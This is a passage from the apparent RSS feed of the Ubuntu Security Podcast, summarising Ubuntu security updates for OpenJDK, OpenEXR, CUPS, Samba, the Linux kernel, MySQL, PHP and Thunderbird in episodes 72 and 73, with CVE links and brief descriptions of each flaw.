<li><a href="https://ubuntu.com/security/CVE-2020-2803">CVE-2020-2803</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2800">CVE-2020-2800</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2781">CVE-2020-2781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2778">CVE-2020-2778</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2773">CVE-2020-2773</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2767">CVE-2020-2767</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2757">CVE-2020-2757</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2756">CVE-2020-2756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2755">CVE-2020-2755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2754">CVE-2020-2754</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>openjdk 11.0.7 and 8u252b09-1</li>
<li>Errors in regex handling and XML handling -&gt; DoS</li>
<li>Various issues in TLS handshake handling -&gt; bypass certification
verification or allow to compromise secure connections</li>
<li>Insecure handling of CRLF in HTTP headers -&gt; info disclosure via
bypassing access controls</li>
<li>Possible sandbox bypass</li>
</ul>
<h3 id="usn-4338-1-usn-4338-2-re2c-vulnerability-02-26">[<a href="https://usn.ubuntu.com/4338-1/">USN-4338-1</a>, <a href="https://usn.ubuntu.com/4338-2/">USN-4338-2</a>] re2c vulnerability [02:26]</h3>
<ul>
<li>1 CVEs addressed in Eoan, Focal
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11958">CVE-2020-11958</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Used to generate fast C code for parsing regular expressions</li>
<li>Heap buffer overflow if parsing a very long input due to incorrect length
checks</li>
</ul>
<h3 id="usn-4339-1-openexr-vulnerabilities-02-59">[<a href="https://usn.ubuntu.com/4339-1/">USN-4339-1</a>] OpenEXR vulnerabilities [02:59]</h3>
<ul>
<li>12 CVEs addressed in Xenial, Bionic, Eoan, Focal
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11765">CVE-2020-11765</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11764">CVE-2020-11764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11763">CVE-2020-11763</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11762">CVE-2020-11762</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11761">CVE-2020-11761</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11760">CVE-2020-11760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11759">CVE-2020-11759</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11758">CVE-2020-11758</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18444">CVE-2018-18444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9115">CVE-2017-9115</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9113">CVE-2017-9113</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9111">CVE-2017-9111</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Last mentioned back in <a href="https://ubuntusecuritypodcast.org/episode-49/">Episode 49</a> - handles image format developed by ILM
with a high definition range for computer imaging applications - used by
opencv, gimp and others</li>
<li>Project Zero fuzzing OpenEXR - usual types of issues in large C++ code
base - OOB reads / writes - usual effects -&gt; crashes, info leaks, RCE</li>
</ul>
<h3 id="usn-4340-1-cups-vulnerabilities-04-09">[<a href="https://usn.ubuntu.com/4340-1/">USN-4340-1</a>] CUPS vulnerabilities [04:09]</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Eoan, Focal
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-3898">CVE-2020-3898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2228">CVE-2019-2228</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow when parsing ppd files - so if added a printer with
a crafted ppd file could crash / RCE - since cupsd runs as root could be
possible RCE as root</li>
<li>OOB read -&gt; info leak / crash</li>
</ul>
<h3 id="usn-4341-1-usn-4341-2-usn-4341-3-samba-vulnerabilities-05-11">[<a href="https://usn.ubuntu.com/4341-1/">USN-4341-1</a>, <a href="https://usn.ubuntu.com/4341-2/">USN-4341-2</a>, <a href="https://usn.ubuntu.com/4341-3/">USN-4341-3</a>] Samba vulnerabilities [05:11]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM, Xenial, Bionic, Eoan, Focal
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10704">CVE-2020-10704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10700">CVE-2020-10700</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Stack overflow able to be triggered by an unauthenticated user when Samba
is acting as an AD DC -&gt; crash, code exec?</li>
<li>UAF in Samba AD DC LDAP server</li>
</ul>
<h3 id="usn-4342-1-linux-kernel-vulnerabilities-06-02">[<a href="https://usn.ubuntu.com/4342-1/">USN-4342-1</a>] Linux kernel vulnerabilities [06:02]</h3>
<ul>
<li>7 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-9383">CVE-2020-9383</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8992">CVE-2020-8992</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8648">CVE-2020-8648</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10942">CVE-2020-10942</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19768">CVE-2019-19768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16234">CVE-2019-16234</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11884">CVE-2020-11884</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.3 kernel for eoan + bionic hwe</li>
<li>s390 specific race-condition in page table handling -&gt; local attacker arbitrary
code exec</li>
<li>race-condition -&gt; UAF in block io tracing -&gt; OOB read -&gt; info leak / crash</li>
<li>stack buffer overflow in vhost-net driver -&gt; able to be triggered by a
local attacker via ioctl() on /dev/vhost-net</li>
<li>race-condition -&gt; UAF in tty (virtual terminal) subsystem</li>
<li>low priority (DoS etc via crafted file-systems)</li>
</ul>
<h3 id="usn-4344-1-linux-kernel-vulnerabilities-07-58">[<a href="https://usn.ubuntu.com/4344-1/">USN-4344-1</a>] Linux kernel vulnerabilities [07:58]</h3>
<ul>
<li>7 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-9383">CVE-2020-9383</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8992">CVE-2020-8992</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8648">CVE-2020-8648</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10942">CVE-2020-10942</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19768">CVE-2019-19768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19051">CVE-2019-19051</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16234">CVE-2019-16234</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.0 gke / oem kernel</li>
<li>Same issues reported earlier</li>
</ul>
<h3 id="usn-4343-1-linux-kernel-vulnerability-08-13">[<a href="https://usn.ubuntu.com/4343-1/">USN-4343-1</a>] Linux kernel vulnerability [08:13]</h3>
<ul>
<li>1 CVEs addressed in Focal
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11884">CVE-2020-11884</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 kernel</li>
<li>s390 page-table issue</li>
</ul>
<h3 id="usn-4345-1-linux-kernel-vulnerabilities-08-25">[<a href="https://usn.ubuntu.com/4345-1/">USN-4345-1</a>] Linux kernel vulnerabilities [08:25]</h3>
<ul>
<li>9 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-9383">CVE-2020-9383</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8648">CVE-2020-8648</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11668">CVE-2020-11668</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11609">CVE-2020-11609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11608">CVE-2020-11608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10942">CVE-2020-10942</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19768">CVE-2019-19768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16234">CVE-2019-16234</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11884">CVE-2020-11884</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 kernel - xenial hwe + bionic</li>
<li>Same as above plus a few OOBs read when handing invalid USB camera device
descriptors in various drivers - so a local attacker could cause a crash
etc</li>
</ul>
<h3 id="usn-4346-1-linux-kernel-vulnerabilities-09-00">[<a href="https://usn.ubuntu.com/4346-1/">USN-4346-1</a>] Linux kernel vulnerabilities [09:00]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM, Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-9383">CVE-2020-9383</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8648">CVE-2020-8648</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19768">CVE-2019-19768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16234">CVE-2019-16234</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16233">CVE-2019-16233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 kernel - trusty hwe + xenial</li>
<li>tty and blk io subsystem race-conditions -&gt; UAFs</li>
</ul>
<h3 id="usn-4347-1-webkitgtk-vulnerability-09-26">[<a href="https://usn.ubuntu.com/4347-1/">USN-4347-1</a>] WebKitGTK vulnerability [09:26]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Eoan, Focal
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-3899">CVE-2020-3899</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4348-1-mailman-vulnerabilities-09-47">[<a href="https://usn.ubuntu.com/4348-1/">USN-4348-1</a>] Mailman vulnerabilities [09:47]</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12137">CVE-2020-12137</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13796">CVE-2018-13796</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-0618">CVE-2018-0618</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible XSS when viewing list archives since mailman does not track the
mime-type of attachments -&gt; so HTTP reply may lack a MIME type and so the
receiving browser may assume that content-type is text/html and so
execute contained Javascript code</li>
</ul>
<h3 id="usn-4349-1-edk-ii-vulnerabilities-10-36">[<a href="https://usn.ubuntu.com/4349-1/">USN-4349-1</a>] EDK II vulnerabilities [10:36]</h3>
<ul>
<li>9 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14587">CVE-2019-14587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14586">CVE-2019-14586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14575">CVE-2019-14575</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14563">CVE-2019-14563</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14559">CVE-2019-14559</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14558">CVE-2019-14558</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12181">CVE-2018-12181</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12180">CVE-2018-12180</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12178">CVE-2018-12178</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UEFI firmware stack for x86-64 virtual machines - huge amount of code with a
large attack surface -&gt; network stack, disk device and file-system
handling, cryptographic signature parsing etc</li>
<li>Buffer overflow in network stack and block io system</li>
<li>stack overflow, fail to clear memory containing passwords, memory leaks,
failure to properly check EFI signatures, memory corruption via a double
free etc</li>
</ul>
<h3 id="usn-4350-1-mysql-vulnerabilities-12-05">[<a href="https://usn.ubuntu.com/4350-1/">USN-4350-1</a>] MySQL vulnerabilities [12:05]</h3>
<ul>
<li>25 CVEs addressed in Xenial, Bionic, Eoan, Focal
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-2930">CVE-2020-2930</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2928">CVE-2020-2928</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2926">CVE-2020-2926</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2925">CVE-2020-2925</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2924">CVE-2020-2924</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2923">CVE-2020-2923</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2922">CVE-2020-2922</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2921">CVE-2020-2921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2904">CVE-2020-2904</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2903">CVE-2020-2903</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2901">CVE-2020-2901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2898">CVE-2020-2898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2897">CVE-2020-2897</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2896">CVE-2020-2896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2895">CVE-2020-2895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2893">CVE-2020-2893</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2892">CVE-2020-2892</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2812">CVE-2020-2812</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2804">CVE-2020-2804</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2780">CVE-2020-2780</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2765">CVE-2020-2765</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2763">CVE-2020-2763</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2762">CVE-2020-2762</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2760">CVE-2020-2760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2759">CVE-2020-2759</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream point releases - 8.0.80 for eoan + focal, 5.7.30 for
xenial and bionic</li>
<li><a href="https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-30.html">https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-30.html</a></li>
<li><a href="https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-20.html">https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-20.html</a></li>
<li><a href="https://www.oracle.com/security-alerts/cpuapr2020.html">https://www.oracle.com/security-alerts/cpuapr2020.html</a></li>
</ul>
<h3 id="usn-4330-2-php-vulnerabilities-12-46">[<a href="https://usn.ubuntu.com/4330-2/">USN-4330-2</a>] PHP vulnerabilities [12:46]</h3>
<ul>
<li>3 CVEs addressed in Focal
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-7066">CVE-2020-7066</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7065">CVE-2020-7065</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7064">CVE-2020-7064</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>See <a href="https://ubuntusecuritypodcast.org/episode-72/">Episode 72</a></li>
</ul>
<h3 id="usn-4332-2-file-roller-vulnerability-13-05">[<a href="https://usn.ubuntu.com/4332-2/">USN-4332-2</a>] File Roller vulnerability [13:05]</h3>
<ul>
<li>1 CVEs addressed in Focal
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11736">CVE-2020-11736</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>See <a href="https://ubuntusecuritypodcast.org/episode-72/">Episode 72</a></li>
</ul>
<h3 id="usn-4333-2-python-vulnerabilities-13-06">[<a href="https://usn.ubuntu.com/4333-2/">USN-4333-2</a>] Python vulnerabilities [13:06]</h3>
<ul>
<li>2 CVEs addressed in Focal
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8492">CVE-2020-8492</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18348">CVE-2019-18348</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>See <a href="https://ubuntusecuritypodcast.org/episode-72/">Episode 72</a></li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="release-of-ubuntu-20-dot-04-lts--focal-fossa--13-16">Release of Ubuntu 20.04 LTS (Focal Fossa) [13:16]</h3>
<ul>
<li>Supported as LTS for 5 years and as ESM for 5 years -&gt; 10 years of
security support</li>
<li>Kernel changes -&gt; based on upstream 5.4 LTS kernel, includes Lockdown
LSM, Wireguard as built-in to the kernel</li>
<li>SSH client / server supports hardware based 2 factor auth (like Yubikeys) OOTB</li>
<li>More stringent TLS default parameters to blacklist insecure ciphers /
key-lengths etc</li>
</ul>
<h3 id="joe-and-alex-discuss-kaiji-botnet-targeting-linux-iot-devices-16-00">Joe and Alex discuss Kaiji Botnet targeting Linux IoT devices [16:00]</h3>
<ul>
<li><a href="https://threatpost.com/kaiji-botnet-iot-linux-devices/155463/">https://threatpost.com/kaiji-botnet-iot-linux-devices/155463/</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E073.mp3" length="29423608" type="audio/mpeg" /><itunes:duration>30:38</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 72
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-72/</link>
          <pubDate>Fri, 24 Apr 2020 10:46:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>750d3ead49a7caba8b2c33f3c220a1dccf0448ec1eb8b808b93da36dcd80fe057a46919509210da2954652e54e721fcdfb9199e5231c363081fba8129b12b9f1</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 72</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          A huge number of CVEs fixed in the various Ubuntu releases, including for
  PHP, Git, Thunderbird, GNU binutils and more, plus Joe McManus discusses
  ROS with Sid Faber.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  A huge number of CVEs fixed in the various Ubuntu releases, including for
  PHP, Git, Thunderbird, GNU binutils and more, plus Joe McManus discusses
  ROS with Sid Faber.
  </itunes:summary>
        <description>  A huge number of CVEs fixed in the various Ubuntu releases, including for
  PHP, Git, Thunderbird, GNU binutils and more, plus Joe McManus discusses
  ROS with Sid Faber.
  </description>
        <googleplay:description>  A huge number of CVEs fixed in the various Ubuntu releases, including for
  PHP, Git, Thunderbird, GNU binutils and more, plus Joe McManus discusses
  ROS with Sid Faber.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>A huge number of CVEs fixed in the various Ubuntu releases, including for
PHP, Git, Thunderbird, GNU binutils and more, plus Joe McManus discusses
ROS with Sid Faber.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>93 unique CVEs addressed</p>
<h3 id="usn-4330-1-php-vulnerabilities-01-03">[<a href="https://usn.ubuntu.com/4330-1/">USN-4330-1</a>] PHP vulnerabilities [01:03]</h3>
<ul>
<li>5 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-7066">CVE-2020-7066</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7065">CVE-2020-7065</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7064">CVE-2020-7064</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7063">CVE-2020-7063</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7062">CVE-2020-7062</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>php5, php7.0, php7.2, php7.3</li>
<li>get_headers() would silently truncate a URL containing a NUL terminator
(\0) - so if used with user-supplied URL could get wrong details from the
server</li>
<li>stack overflow in mb_strtolower() when handling UTF32-LE encoding</li>
<li>1 byte buffer overread in handling EXIF data - info leak / crash</li>
<li>PHAR archives created with world readable permissions</li>
<li>NULL pointer dereference on file upload in certain situations -&gt; crash</li>
</ul>
<h3 id="usn-4331-1-webkitgtk-plus-vulnerability-02-32">[<a href="https://usn.ubuntu.com/4331-1/">USN-4331-1</a>] WebKitGTK+ vulnerability [02:32]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11793">CVE-2020-11793</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF when processing maliciously crafted web content</li>
</ul>
<h3 id="usn-4332-1-file-roller-vulnerability-02-51">[<a href="https://usn.ubuntu.com/4332-1/">USN-4332-1</a>] File Roller vulnerability [02:51]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11736">CVE-2020-11736</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible directory traversal issue when extracting an archive where
parent of file is a symlink pointing outside of the archive</li>
</ul>
<h3 id="usn-4334-1-git-vulnerability-03-08">[<a href="https://usn.ubuntu.com/4334-1/">USN-4334-1</a>] Git vulnerability [03:08]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11008">CVE-2020-11008</a> <!-- raw HTML omitted --></li>
<li>Similar to <a href="https://ubuntu.com/security/CVE-2020-5260">CVE-2020-5260</a> from <a href="https://ubuntusecuritypodcast.org/episode-71/">Episode 71</a> - due to an incomplete fix for
that where some credentials may still be leaked but the attacker cannot
control which ones</li>
</ul>
</li>
</ul>
<h3 id="usn-4333-1-python-vulnerabilities-03-47">[<a href="https://usn.ubuntu.com/4333-1/">USN-4333-1</a>] Python vulnerabilities [03:47]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8492">CVE-2020-8492</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18348">CVE-2019-18348</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>CRLF injection via an attacker controlled url parameter to urlopen()
function in urllib</li>
</ul>
<h3 id="usn-4335-1-thunderbird-vulnerabilities-04-09">[<a href="https://usn.ubuntu.com/4335-1/">USN-4335-1</a>] Thunderbird vulnerabilities [04:09]</h3>
<ul>
<li>39 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-6811">CVE-2020-6811</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6794">CVE-2020-6794</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6822">CVE-2020-6822</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6795">CVE-2020-6795</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6793">CVE-2020-6793</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6792">CVE-2020-6792</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15903">CVE-2019-15903</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11755">CVE-2019-11755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11745">CVE-2019-11745</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6825">CVE-2020-6825</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6821">CVE-2020-6821</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6820">CVE-2020-6820</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6819">CVE-2020-6819</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6814">CVE-2020-6814</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6812">CVE-2020-6812</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6807">CVE-2020-6807</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6806">CVE-2020-6806</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6805">CVE-2020-6805</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6800">CVE-2020-6800</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6798">CVE-2020-6798</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20503">CVE-2019-20503</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17026">CVE-2019-17026</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17024">CVE-2019-17024</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17022">CVE-2019-17022</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17017">CVE-2019-17017</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17016">CVE-2019-17016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17012">CVE-2019-17012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17011">CVE-2019-17011</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17010">CVE-2019-17010</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17008">CVE-2019-17008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17005">CVE-2019-17005</a> <!-- raw HTML omitted --></li>
